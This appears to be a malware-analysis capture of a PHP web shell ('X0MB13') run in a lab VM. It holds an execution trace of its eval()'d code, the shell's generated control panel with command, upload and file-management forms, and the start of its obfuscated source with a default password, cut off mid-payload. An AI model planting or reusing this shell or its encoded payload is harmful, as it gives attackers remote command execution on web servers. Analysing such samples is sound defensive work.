3	155	0	0.007431	521944	function_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'posix_getgrgid'
3	155	1	0.007444	521984
3	155	R			TRUE
3	156	0	0.007457	521944	fileowner	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.htaccess'
3	156	1	0.007472	521992
3	156	R			0
3	157	0	0.007485	521952	posix_getpwuid	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	0
3	157	1	0.007509	522752
3	157	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	41	$own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3	158	0	0.007552	521952	filegroup	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.htaccess'
3	158	1	0.007565	521992
3	158	R			0
3	159	0	0.007578	521952	posix_getgrgid	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	0
3	159	1	0.007600	522608
3	159	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	41	$grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3	160	0	0.007636	522032	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.'
3	160	1	0.007651	522112
3	160	R			'/var/www/html/uploads'
3	161	0	0.007666	522144	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.'
3	161	1	0.007680	522224
3	161	R			'/var/www/html/uploads'
3	162	0	0.007696	522208	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.'
3	162	1	0.007710	522288
3	162	R			'/var/www/html/uploads'
3	163	0	0.007725	522592	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.'
3	163	1	0.007739	522672
3	163	R			'/var/www/html/uploads'
3	164	0	0.007753	522720	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.htaccess'
3	164	1	0.007769	522808
3	164	R			'/var/www/html/uploads/.htaccess'
3	165	0	0.007785	522976	get_color	1		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.htaccess'
4	166	0	0.007799	522976	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'.htaccess'
4	166	1	0.007817	523016
4	166	R			FALSE
4	167	0	0.007831	522976	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'.htaccess'
4	167	1	0.007854	523016
4	167	R			FALSE
4	168	0	0.007873	522976	is_readable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'.htaccess'
4	168	1	0.007895	523016
4	168	R			TRUE
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	55	$c = ''
4	169	0	0.007931	522976	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'.htaccess'
4	169	1	0.007953	523016
4	169	R			FALSE
4	170	0	0.007971	522976	is_readable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'.htaccess'
4	170	1	0.007991	523016
4	170	R			TRUE
3	165	1	0.008009	522976
3	165	R			''
3	171	0	0.008027	522976	perms	1		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.htaccess'
4	172	0	0.008045	522976	file_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'.htaccess'
4	172	1	0.008065	523016
4	172	R			TRUE
4	173	0	0.008082	522976	fileperms	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'.htaccess'
4	173	1	0.008100	523016
4	173	R			33188
4	174	0	0.008118	522976	sprintf	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'%o'	33188
4	174	1	0.008136	523360
4	174	R			'100644'
4	175	0	0.008154	523296	substr	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'100644'	-4
4	175	1	0.008172	523392
4	175	R			'0644'
3	171	1	0.008195	523008
3	171	R			'0644'
3	176	0	0.008213	523232	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.'
3	176	1	0.008233	523312
3	176	R			'/var/www/html/uploads'
3	177	0	0.008253	523232	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.htaccess'
3	177	1	0.008272	523320
3	177	R			'/var/www/html/uploads/.htaccess'
3	178	0	0.008292	523232	perms	1		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.htaccess'
4	179	0	0.008310	523232	file_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'.htaccess'
4	179	1	0.008332	523272
4	179	R			TRUE
4	180	0	0.008350	523232	fileperms	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'.htaccess'
4	180	1	0.008367	523272
4	180	R			33188
4	181	0	0.008385	523232	sprintf	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'%o'	33188
4	181	1	0.008403	523616
4	181	R			'100644'
4	182	0	0.008420	523552	substr	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'100644'	-4
4	182	1	0.008438	523648
4	182	R			'0644'
3	178	1	0.008456	523264
3	178	R			'0644'
3	183	0	0.008475	521952	function_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'posix_getpwuid'
3	183	1	0.008495	521992
3	183	R			TRUE
3	184	0	0.008512	521952	function_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'posix_getgrgid'
3	184	1	0.008530	521992
3	184	R			TRUE
3	185	0	0.008547	521952	fileowner	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'about.php'
3	185	1	0.008568	521992
3	185	R			1000
3	186	0	0.008585	521952	posix_getpwuid	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	1000
3	186	1	0.008628	522768
3	186	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	41	$own = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3	187	0	0.008686	521968	filegroup	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'about.php'
3	187	1	0.008701	522008
3	187	R			1000
3	188	0	0.008715	521968	posix_getgrgid	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	1000
3	188	1	0.008749	522624
3	188	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	41	$grp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3	189	0	0.008786	522048	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.'
3	189	1	0.008801	522128
3	189	R			'/var/www/html/uploads'
3	190	0	0.008817	522160	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.'
3	190	1	0.008831	522240
3	190	R			'/var/www/html/uploads'
3	191	0	0.008846	522224	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.'
3	191	1	0.008860	522304
3	191	R			'/var/www/html/uploads'
3	192	0	0.008875	522608	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.'
3	192	1	0.008889	522688
3	192	R			'/var/www/html/uploads'
3	193	0	0.008903	522736	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'about.php'
3	193	1	0.008917	522824
3	193	R			'/var/www/html/uploads/about.php'
3	194	0	0.008933	522992	get_color	1		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'about.php'
4	195	0	0.008947	522992	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'about.php'
4	195	1	0.008964	523032
4	195	R			FALSE
4	196	0	0.008977	522992	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'about.php'
4	196	1	0.008992	523032
4	196	R			FALSE
4	197	0	0.009005	522992	is_readable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'about.php'
4	197	1	0.009020	523032
4	197	R			TRUE
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	55	$c = ''
4	198	0	0.009046	522992	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'about.php'
4	198	1	0.009071	523032
4	198	R			FALSE
4	199	0	0.009085	522992	is_readable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'about.php'
4	199	1	0.009100	523032
4	199	R			TRUE
3	194	1	0.009149	522992
3	194	R			''
3	200	0	0.009166	522992	perms	1		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'about.php'
4	201	0	0.009181	522992	file_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'about.php'
4	201	1	0.009198	523032
4	201	R			TRUE
4	202	0	0.009211	522992	fileperms	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'about.php'
4	202	1	0.009225	523032
4	202	R			33204
4	203	0	0.009237	522992	sprintf	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'%o'	33204
4	203	1	0.009252	523376
4	203	R			'100664'
4	204	0	0.009265	523312	substr	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'100664'	-4
4	204	1	0.009279	523408
4	204	R			'0664'
3	200	1	0.009292	523024
3	200	R			'0664'
3	205	0	0.009305	523248	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.'
3	205	1	0.009320	523328
3	205	R			'/var/www/html/uploads'
3	206	0	0.009335	523248	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'about.php'
3	206	1	0.009349	523336
3	206	R			'/var/www/html/uploads/about.php'
3	207	0	0.009364	523248	perms	1		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'about.php'
4	208	0	0.009378	523248	file_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'about.php'
4	208	1	0.009393	523288
4	208	R			TRUE
4	209	0	0.009406	523248	fileperms	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'about.php'
4	209	1	0.009420	523288
4	209	R			33204
4	210	0	0.009432	523248	sprintf	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'%o'	33204
4	210	1	0.009446	523632
4	210	R			'100664'
4	211	0	0.009459	523568	substr	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'100664'	-4
4	211	1	0.009473	523664
4	211	R			'0664'
3	207	1	0.009486	523280
3	207	R			'0664'
3	212	0	0.009500	521968	function_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'posix_getpwuid'
3	212	1	0.009515	522008
3	212	R			TRUE
3	213	0	0.009527	521968	function_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'posix_getgrgid'
3	213	1	0.009541	522008
3	213	R			TRUE
3	214	0	0.009553	521968	fileowner	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'prepend.php'
3	214	1	0.009569	522008
3	214	R			0
3	215	0	0.009581	521968	posix_getpwuid	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	0
3	215	1	0.009606	522768
3	215	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	41	$own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3	216	0	0.009649	521952	filegroup	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'prepend.php'
3	216	1	0.009663	521992
3	216	R			0
3	217	0	0.009675	521952	posix_getgrgid	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	0
3	217	1	0.009697	522608
3	217	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	41	$grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3	218	0	0.009733	522032	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.'
3	218	1	0.009748	522112
3	218	R			'/var/www/html/uploads'
3	219	0	0.009763	522176	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.'
3	219	1	0.009777	522256
3	219	R			'/var/www/html/uploads'
3	220	0	0.009791	522272	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.'
3	220	1	0.009805	522352
3	220	R			'/var/www/html/uploads'
3	221	0	0.009820	522592	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.'
3	221	1	0.009834	522672
3	221	R			'/var/www/html/uploads'
3	222	0	0.009852	522720	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'prepend.php'
3	222	1	0.009867	522816
3	222	R			'/var/www/html/uploads/prepend.php'
3	223	0	0.009883	522976	get_color	1		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'prepend.php'
4	224	0	0.009897	522976	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'prepend.php'
4	224	1	0.009913	523016
4	224	R			FALSE
4	225	0	0.009926	522976	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'prepend.php'
4	225	1	0.009941	523016
4	225	R			FALSE
4	226	0	0.009954	522976	is_readable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'prepend.php'
4	226	1	0.009969	523016
4	226	R			TRUE
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	55	$c = ''
4	227	0	0.009995	522976	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'prepend.php'
4	227	1	0.010010	523016
4	227	R			FALSE
4	228	0	0.010023	522976	is_readable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'prepend.php'
4	228	1	0.010038	523016
4	228	R			TRUE
3	223	1	0.010051	522976
3	223	R			''
3	229	0	0.010064	522976	perms	1		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'prepend.php'
4	230	0	0.010077	522976	file_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'prepend.php'
4	230	1	0.010093	523016
4	230	R			TRUE
4	231	0	0.010107	522976	fileperms	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'prepend.php'
4	231	1	0.010121	523016
4	231	R			33261
4	232	0	0.010133	522976	sprintf	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'%o'	33261
4	232	1	0.010148	523360
4	232	R			'100755'
4	233	0	0.010161	523296	substr	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'100755'	-4
4	233	1	0.010175	523392
4	233	R			'0755'
3	229	1	0.010188	523008
3	229	R			'0755'
3	234	0	0.010201	523232	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'.'
3	234	1	0.010215	523312
3	234	R			'/var/www/html/uploads'
3	235	0	0.010235	523232	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'prepend.php'
3	235	1	0.010252	523328
3	235	R			'/var/www/html/uploads/prepend.php'
3	236	0	0.010268	523232	perms	1		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'prepend.php'
4	237	0	0.010282	523232	file_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'prepend.php'
4	237	1	0.010298	523272
4	237	R			TRUE
4	238	0	0.010311	523232	fileperms	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'prepend.php'
4	238	1	0.010325	523272
4	238	R			33261
4	239	0	0.010338	523232	sprintf	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'%o'	33261
4	239	1	0.010351	523616
4	239	R			'100755'
4	240	0	0.010365	523552	substr	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'100755'	-4
4	240	1	0.010378	523648
4	240	R			'0755'
3	236	1	0.010391	523264
3	236	R			'0755'
2	10	1	0.010410	521952
1	3	1	0.010424	454224
			0.010451	371888
TRACE END   [2023-02-13 01:42:37.621121]


Generated HTML code

<html><head></head><body><br>
<b>Warning</b>:  ob_start(): output handler 'ob_gzhandler' conflicts with 'zlib output compression' in <b>/home/aravalcl/public_html/wp/wp-content/plugins/seo/alfa-index.php(3) : eval()'d code(1) : eval()'d code</b> on line <b>3245</b><br>
<title>localhost =&gt; X0MB13</title><style>body {background:#333333;color:#999999;font-size:9pt;font-family:Trebuchet MS,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:#999999;text-decoration:none;font-family:Comic Sans Ms,cursive,sans serif;}a:hover {color:#79a317;}hr {background:#999999;color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13pt;}#menuB {background:#333333;box-shadow:0px 0px 10px black;border-radius:15px;padding:5px 20px 5px 20px;}table#moreI{font-size:9pt;background:#333333;border-radius:10px;box-shadow:0px 0px 10px black;padding:5px;position:fixed;bottom:40px;right:40px;display:none;}p#cp {font-size:11pt;}table#lt {font-size:10pt;}input#lt,input#sv {background:#333333;border-radius:10px;border:1px solid #999999;color:#999999;text-align:center;}input#ltb {background:rgba(0,0,0,0);border-radius:10px;color:#999999;box-shadow:0px 0px 1px #999999;border:0px solid rgba(0,0,0,0);}table#ft {font-size:9pt;padding:5px;border-radius:10px;box-shadow:0px 0px 10px black;}td#fh {border-bottom:1px solid #999999;padding-bottom:3px;}tr#fn:hover{box-shadow:0px 0px 5px black;}h3 {text-shadow:0px 0px 4px black;font-size:13pt;}textarea#edit {background:#333333;color:#999999;box-shadow:0px 0px 10px black;border-radius:10px;border:none;padding:10px;}</style><script type="text/javascript">function get_inf() {if(document.getElementById('moreI').style.display=="block"){document.getElementById('moreI').style.display="none"}else {document.getElementById('moreI').style.display="block";}} function xyn(id1,id2) {document.getElementById(id1).style.display="block";document.getElementById(id2).style.display="none";}</script><h1 id="n"><a href="?x=x">X0MB13</a></h1><center><p id="menu"><span id="menuB">&lt;<a href="about.php(17) : eval()'d code">Home</a>&gt; &lt;<a href="?x=cmd&amp;d=" var="" www="" html"="">Command</a>&gt; &lt;<a href="?x=php&amp;d=" var="" www="" html"="">PHP</a>&gt; &lt;<a href="javascript:get_inf();">Info</a>&gt; &lt;<a href="?x=q">Logout</a>&gt; </span></p></center><center><p id="inf">||| <b><i><u>Software:</u></i></b> Apache/2.4.52 (Ubuntu)  |||  <b><i><u>Uname:</u></i></b> Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 |||<br>||| <b><i><u>User:</u></i></b> osboxes uid:1000 gid:1000 ||| <b><i><u>Safe Mode:</u></i></b> <font color="#ccff00">OFF</font> ||| <b><i><u>Directory: </u></i></b>/var/www/html |||</p></center><hr><table id="moreI"><tbody><tr><td>PHP Version</td><td> :&gt; </td><td> 7.2.34-37+ubuntu22.04.1+deb.sury.org+1</td></tr><tr><td>Zend Version</td><td> :&gt; </td><td> 3.2.0</td></tr><tr><td>Magic Quotes</td><td> :&gt; </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>Curl</td><td> :&gt; </td><td> <font color="crimson">ON</font></td></tr><tr><td>Register Globals</td><td> :&gt; </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>OpenBase Dir</td><td> :&gt; </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>MySQL</td><td> :&gt; </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>Gzip</td><td> :&gt; </td><td> <font color="crimson">ON</font></td></tr><tr><td>MsSQL</td><td> :&gt; </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>PostgreSQL</td><td> :&gt; </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>Oracle</td><td> :&gt; </td><td> <font color="#ccff00">OFF</font></td></tr><tr><td>Total Space</td><td> :&gt; </td><td> 216.08GB</td></tr><tr><td>Used Space</td><td> :&gt; </td><td> 182.04GB</td></tr><tr><td>Your IP</td><td> :&gt; </td><td> ::1</td></tr><tr><td>Server IP</td><td> :&gt; </td><td> ::1</td></tr><tr><td colspan="3" align="center"><a href="?x=phpinf" target="_blank">PHPInfo</a></td></tr></tbody></table><p align="center" id="cp"><a href="?d=/"></a>/<a href="?d=/var/">var</a>/<a href="?d=/var/www/">www</a>/<a href="?d=/var/www/html/">html</a>/</p><table width="90%" align="center" id="lt" cellpadding="0"><tbody><tr><td align="center"><form action="?d=/var/www/html" method="GET">Create Dir: <input type="hidden" name="d" value="/var/www/html" id="lt"><input type="text" value="" name="ndir" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d=" var="" www="" html"="" method="GET">Create File: <input type="hidden" value="/var/www/html" name="d" id="lt"><input type="hidden" value="c" name="x"><input type="text" value="" name="f" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?x=cmd&amp;d=/var/www/html" method="POST">Command: <input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d=/var/www/html" method="POST" enctype="multipart/form-data">Upload: <input type="hidden" value="100000000" name="MAX_FILE_SIZE"><input type="file" name="upfile" id="ltb"> <input type="submit" value="Go" id="lt"></form></td></tr></tbody></table><br><table width="75%" align="center" id="ft"><tbody><tr><td id="fh"><b>Name</b></td><td id="fh" align="center"><b>Permissions</b></td><td id="fh" align="center"><b>Owner</b></td><td id="fh" align="center"><b>Options</b></td></tr><tr id="fn"><td id="fc"><span id="n."><a href="?d=/var/www/html">.</a></span><span id="r." style="display:none;"><form action="?d=/var/www/html" method="POST"><input type="hidden" value="/var/www/html" name="d"> <input type="text" value="." id="lt" name="new"><input type="hidden" value="." name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onclick="xyn('n.','r.');"></form></span><span id="d." style="display:none;"><form action="?d=/var/www/html" method="GET">Are you Sure?<input type="hidden" value="/var/www/html" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onclick="xyn('n.','d.')"></form></span></td><td id="fc" align="center"><span id="h."><a href="javascript:xyn('c.','h.');"><font color="#ccff00">0777</font></a></span><span id="c." style="display:none;"><form action="?d=/var/www/html" method="GET"><input type="hidden" value="/var/www/html" name="df"><input type="text" value="0777" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onclick="xyn('h.','c.');"></form></span></td><td id="fc" align="center">root : root</td><td id="fc"></td></tr><tr id="fn"><td id="fc"><span id="n.."><a href="?d=/var/www">..</a></span><span id="r.." style="display:none;"><form action="?d=/var/www/html" method="POST"><input type="hidden" value="/var/www/html" name="d"> <input type="text" value=".." id="lt" name="new"><input type="hidden" value=".." name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onclick="xyn('n..','r..');"></form></span><span id="d.." style="display:none;"><form action="?d=/var/www/html" method="GET">Are you Sure?<input type="hidden" value="/var/www" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onclick="xyn('n..','d..')"></form></span></td><td id="fc" align="center"><span id="h.."><a href="javascript:xyn('c..','h..');"><font color="#ccff00">0777</font></a></span><span id="c.." style="display:none;"><form action="?d=/var/www/html" method="GET"><input type="hidden" value="/var/www" name="df"><input type="text" value="0777" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onclick="xyn('h..','c..');"></form></span></td><td id="fc" align="center">root : root</td><td id="fc"></td></tr><tr id="fn"><td id="fc"><span id="nabout.php"><a href="?x=c&amp;d=/var/www/html&amp;f=about.php">about.php</a></span><span id="rabout.php" style="display:none;"><form action="?d=/var/www/html" method="POST"><input type="hidden" value="/var/www/html" name="d"> <input type="text" id="lt" value="about.php" name="new"><input type="hidden" value="about.php" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onclick="xyn('nabout.php','rabout.php');"></form></span><span id="dabout.php" style="display:none;"><form action="?d=/var/www/html" method="GET">Are you Sure?<input type="hidden" value="/var/www/html/about.php" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onclick="xyn('nabout.php','dabout.php')"></form></span></td><td id="fc" align="center"><span id="habout.php"><a href="javascript:xyn('cabout.php','habout.php');"><font color="">0664</font></a></span><span id="cabout.php" style="display:none;"><form action="?d=/var/www/html" method="GET"><input type="hidden" value="/var/www/html/about.php" name="df"><input type="text" value="0664" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onclick="xyn('habout.php','cabout.php');"></form></span></td><td id="fc" align="center">osboxes : osboxes</td><td id="fc" align="center"><a href="javascript:xyn('rabout.php','nabout.php')">[R]</a> <a href="javascript:xyn('dabout.php','nabout.php');">[D]</a></td></tr><tr id="fn"><td id="fc"><span id="nbeneri.se_malware_analysis"><a href="?x=c&amp;d=/var/www/html&amp;f=beneri.se_malware_analysis">beneri.se_malware_analysis</a></span><span id="rbeneri.se_malware_analysis" style="display:none;"><form action="?d=/var/www/html" method="POST"><input type="hidden" value="/var/www/html" name="d"> <input type="text" id="lt" value="beneri.se_malware_analysis" name="new"><input type="hidden" value="beneri.se_malware_analysis" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onclick="xyn('nbeneri.se_malware_analysis','rbeneri.se_malware_analysis');"></form></span><span id="dbeneri.se_malware_analysis" style="display:none;"><form action="?d=/var/www/html" method="GET">Are you Sure?<input type="hidden" value="/var/www/html/beneri.se_malware_analysis" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onclick="xyn('nbeneri.se_malware_analysis','dbeneri.se_malware_analysis')"></form></span></td><td id="fc" align="center"><span id="hbeneri.se_malware_analysis"><a href="javascript:xyn('cbeneri.se_malware_analysis','hbeneri.se_malware_analysis');"><font color="">0644</font></a></span><span id="cbeneri.se_malware_analysis" style="display:none;"><form action="?d=/var/www/html" method="GET"><input type="hidden" value="/var/www/html/beneri.se_malware_analysis" name="df"><input type="text" value="0644" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onclick="xyn('hbeneri.se_malware_analysis','cbeneri.se_malware_analysis');"></form></span></td><td id="fc" align="center">root : root</td><td id="fc" align="center"><a href="javascript:xyn('rbeneri.se_malware_analysis','nbeneri.se_malware_analysis')">[R]</a> <a href="javascript:xyn('dbeneri.se_malware_analysis','nbeneri.se_malware_analysis');">[D]</a></td></tr><tr id="fn"></tr></tbody></table><br><br><br></body></html>

Original PHP code

<br />
<b>Warning</b>:  ob_start(): output handler 'ob_gzhandler' conflicts with 'zlib output compression' in <b>/home/aravalcl/public_html/wp/wp-content/plugins/seo/alfa-index.php(3) : eval()'d code(1) : eval()'d code</b> on line <b>3245</b><br />
<?php

/**
Design by TubagusNM
Default pass cgi: xaisyndicate
Thx to con7ext_shell, b374k shell, and all members garuda tersakti 72
**/ 


@ini_set('output_buffering',0); 
@ini_set('display_errors', 0);

$sym = "7Rv9aptT8uf2vf4PG0wN0lLRVJw2SiHI1a7t3l0bO8rHeJ3k8UuygCUVwSI4g6v//XNpAQFPtpy73nSTOHNqdHN0dHN0c4eFM1OZwbhSmRObq86wq37xbHu+MDXFZFov5NyOFOiKw0F529zptI3jo9Ozaorl2bbyodslNzBH7dS0Nj7MKAtgGJB8V69w3k6yPUWF7REnQWyn++jw6yHMvSYJaowoQY3Y7EBGWfyAp5az6JSIPnxVHuTsXBwd/fRp+g6Jf+gSylWt706JG+TWjJ3YZmBXlQQxl5O0Rq4tPZubHvBvGK/e/jw1jK7atjm74sywduh1euNnbfLn6cm7lvx6nB69OvvLi5N264PaaRFGsyLLEEJAte27zGOBgLaCFU6DZNMRHZ1hXyFhHIyVPgylC2sUXata1wq7YG2Qv5HSgHjAtQEjHaXoRSrjnc1m92xUmYTUZ4hCE8rGPotGm5r60beTAWnrV2pcgdAOfD8Mh1D96NWrAgT4nwXIOvxPSZb+9YWmHByKP4raaeYOtr8Rf9BA2rbjMVRGJpGTJvok4l6gQpzYVrguFsXNq47y5uzs2GsD6kpjwZpB/jq8PB8dQQYSY287C/i1pMGC3Cw9/23FqHiiR8T8fVKVWII2zg965PaxHf/Cx99LjnmFXhoni/EZ41jXj7hQLkJ7IH47vuI92zN6AiqIUGgdjQ7MG4vaYA7UHIfxnAeqUK3xdXXN1YSHjnxl+BxziLyAzsbQJvjzFfwsE+Av4+fg2Tfe4eiZpJne3AvFIzf1Ugn8gPuUbII3k5q8srYLmsY+OcXFXNqNi/PGEQXLzXZiGHFowXNmVzjJ4do6AGQ3yeYJV4TFq8iRj+uDlJsuqYMuqePQFNeuzuLAiUCSwy9YuhodgrIk7vkOUi/pvC5PR1QmwyV5c84eMy+IXXs8AuGqlhcE4MDGKOgnucQlk463WfhOVxl/e0Y1mB1GSogjidu5KVqtNlji6VNh4jGIeivxFkWzIGHfIiXOUyMUj+Q6ZCojUByJWstoYKQnH+yrnTJ5SwhpjVTAu1qTOCBoC6hMoZfEK2bsg+vieTPxsjIhWy29zrAn/mmbJq1GYZIm/JQBBJfDgsvqFJl1wop1Q51yUtxbi3gnOAgjS5lRzDTXJKl5mhzkQ9gYOwhauelhGubZef9oZ1UaPcTTAqS+RBDacNw74E7s7OkY77V/V5YhLDKXoxhLQgbSLUJ5CCWWUJyFxbUWMjX4m2rlyd6WHrqmj5ZCMN7F